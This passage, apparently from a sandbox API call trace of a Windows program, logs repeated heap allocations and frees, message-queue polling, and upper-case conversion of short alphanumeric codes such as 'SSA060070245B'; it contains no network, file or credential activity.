| out: hHeap=0x25c0000) returned 1 [0188.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0188.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0188.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0188.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0188.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0188.345] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0188.345] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0188.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0188.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0188.345] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0188.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0188.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa538 [0188.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0188.345] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0188.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0188.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0188.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0188.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00c0 [0188.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0188.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00c0 [0188.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0188.346] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0188.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0188.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0188.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0188.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0188.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0188.346] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0188.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0188.346] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0188.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0188.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0188.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0188.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00c0 [0188.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0188.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0188.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0188.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0188.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0188.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0188.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0188.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0188.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0188.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0188.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0188.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0188.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0188.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0188.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0188.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0188.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0188.347] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0188.348] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0188.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0188.348] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0188.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0188.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0188.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa538 [0188.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0188.348] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0188.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0188.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0188.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0188.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0188.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0188.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0188.348] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0188.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0188.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0188.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0188.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0188.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0188.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0188.349] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0188.349] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0188.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0188.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0188.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0188.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0188.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0188.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0188.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0188.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0188.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0188.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0188.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0188.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0188.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0188.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0188.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0188.350] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0188.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0188.350] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0188.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0188.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0188.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0188.350] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0188.350] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0188.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0188.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0188.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0188.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0188.350] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0188.350] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0188.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0188.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0188.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0188.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0188.351] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0188.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0188.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa268 [0188.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0188.351] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0188.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00c0 [0188.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0188.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0188.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00d0 [0188.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0188.351] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0188.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0188.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0188.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0188.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0188.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0188.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.352] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0188.352] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0188.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0188.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0188.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0188.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0188.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0188.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0188.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0188.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0188.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0188.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0188.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0188.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0188.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0188.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0188.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0188.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0188.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34b2250 | out: hHeap=0x25c0000) returned 1 [0188.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0188.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0188.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0188.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0188.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0188.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0188.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0188.356] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0188.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 